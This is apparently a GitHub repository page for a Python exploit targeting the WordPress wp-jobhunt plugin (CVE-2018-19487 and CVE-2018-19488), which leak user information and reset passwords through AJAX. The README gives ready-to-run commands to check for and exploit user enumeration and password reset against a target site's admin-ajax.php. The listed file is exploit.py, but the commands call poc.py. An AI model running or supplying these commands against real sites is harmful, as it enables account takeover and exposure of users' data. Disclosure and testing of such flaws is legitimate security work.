CVE-2018-19487, CVE-2018-19488, exploit for WordPress wp-jobhunt plugin
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md
exploit.py

README.md

wp-jobhunt-exploit

CVE-2018-19487, CVE-2018-19488, exploit for WordPress wp-jobhunt plugin

wp-jobhunt plugin is a plugin used with JobCareer theme:

https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 (see changelog at the bottom)

Python exploit for CVE-2018-19487 (AJAX user information disclosure) and CVE-2018-19488 (AJAX user reset password) for version 2.2 and before.

REQUIREMENTS:

  • requests
  • urllib
  • json

HOW TO USE:

Check if vulnerable to user enumeration:

python poc.py --checkenum https://wpsite/path/to/wp-admin/admin-ajax.php

Check if vulnerable to user reset pass:

python poc.py --checkreset https://wpsite/path/to/wp-admin/admin-ajax.php

Exploit user enumeration:

python poc.py --enum https://wpsite/path/to/wp-admin/admin-ajax.php

Exploit user reset password:

python poc.py --reset https://wpsite/path/to/wp-admin/admin-ajax.php